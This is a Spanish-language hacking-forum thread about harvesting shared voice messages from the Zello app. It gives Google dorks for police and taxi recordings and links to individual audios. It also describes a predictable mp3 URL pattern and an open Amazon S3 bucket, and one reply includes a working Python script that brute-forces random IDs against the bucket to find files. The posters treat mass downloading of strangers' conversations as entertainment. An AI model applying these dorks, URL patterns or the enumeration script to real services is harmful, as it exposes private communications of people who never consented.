Underc0de

Hola gente hoy les voy a hablar de una red social como whatsapp o telegram, pero es por audio o videoconferencia...

Aqui les mando el link de esta red que presume tener 120 millones de usuarios xD. Link project:

https://zello.com

(https://lh6.ggpht.com/b-M6r0i2HvA-diZldKBMcC__xpE9K1sEOOBTcmV1VZz1ze0mNT7kF9KwhnGLILSfz-E)

Lo que mola con esta red es que es totalmente insegura y uno puede encontrarse con video conferencias y audios de todo tipo, sin mas haciendo "hacking con buscadores" con google.

Dork PoC: site:zello.com/shared

68.000 audios y charlas de todo tipo, pero filtremos...

site:zello.com/shared/ policia

78 resultados entre ellos...


https://zello.com/shared/ahvab

O

https://zello.com/shared/ADnfb

PoC Taxis:

site:zello.com/shared taxy

14000 resultados...

Algunos como:

https://zello.com/shared/xoTeb

Espero que se entretengan y sed buenos!.
Saludos Rootkit_Pentester.

"Dame un buscador y movere el mundo".

Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:

Citarhttp://zello.me/get/<id>.mp3

Con un regex y un spider se podrían descargar conversaciones de forma masiva.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:

Citarhttp://zello.me/get/<id>.mp3

Con un regex y un spider se podrían descargar conversaciones de forma masiva.

Genial esa critica @Tatoluckyfox (https://underc0de.org/foro/index.php?action=profile;u=56173), espero otras xD. Mientras tanto cazo mi burpsuite jeje. Saludos }:)

@Rootkit_Pentester (https://underc0de.org/foro/index.php?action=profile;u=63386)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:

Citarhttp://zello.me/get/<id>.mp3

Con un regex y un spider se podrían descargar conversaciones de forma masiva.

Genial esa critica @Tatoluckyfox (https://underc0de.org/foro/index.php?action=profile;u=56173), espero otras xD. Mientras tanto cazo mi burpsuite jeje. Saludos }:)

se puede usar wget de forma recursiva

Tambien se puede usar wget de forma recursiva, pero...
Tengo una novedad @DtxdF (https://underc0de.org/foro/index.php?action=profile;u=71723) @Tatoluckyfox (https://underc0de.org/foro/index.php?action=profile;u=56173)

Los mp3 no vienen de: zello.me sino de un bucket de Amazon   ;D

Este es el Bucket xD: https://s3.amazonaws.com/zello.sharedmessages/
Pueden explotarlo haciendo los 2  tipos de tecnicas que dicen uds o usar bing o archive.org
tendran 14 audios.

Saludos colegas :D

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Tambien se puede usar wget de forma recursiva, pero...
Tengo una novedad @DtxdF (https://underc0de.org/foro/index.php?action=profile;u=71723) @Tatoluckyfox (https://underc0de.org/foro/index.php?action=profile;u=56173)

Los mp3 no vienen de: zello.me sino de un bucket de Amazon   ;D

Este es el Bucket xD: https://s3.amazonaws.com/zello.sharedmessages/
Pueden explotarlo haciendo los 2  tipos de tecnicas que dicen uds o usar bing o archive.org
tendran 14 audios.

Saludos colegas :D

Exacto.
Funciona de una manera muy simple:

           https://s3.amazonaws.com/zello.sharedmessages/<id>

Devuelve un 200 OK si hay archivo de audio, y un 403 Forbidden si no hay archivo.
(https://s33.postimg.cc/ttmlwtaf3/Captura.png)

Los IDs, aparentemente, tienen una longitud de entre 5 y 13 caracteres alfanuméricos en mayúsculas y minúsculas.
Este es un pequeño PoC para encontrar archivos de forma aleatoria con solo 5 caracteres de longitud.
import requests
import random

def random_string():

return "".join([random.choice("qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM") for _ in range(5)])

for x in range(500):

a = random_string()
req = requests.get("https://s3.amazonaws.com/zello.sharedmessages/" + a, headers={'User-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0'})
if req.status_code == 200:

print a + " existe.           - - - - - - - - - - - - -"

else:

print a + " no existe. -> " + str(req.status_code)

Y funciona tal que así.
(https://s33.postimg.cc/yr06hyez3/Captura.png)

Grande capo @Tatoluckyfox (https://underc0de.org/foro/index.php?action=profile;u=56173) te felicito por el script, creo que te lo voy a robar para usarlo como fuzzer!.
Saludos! ;).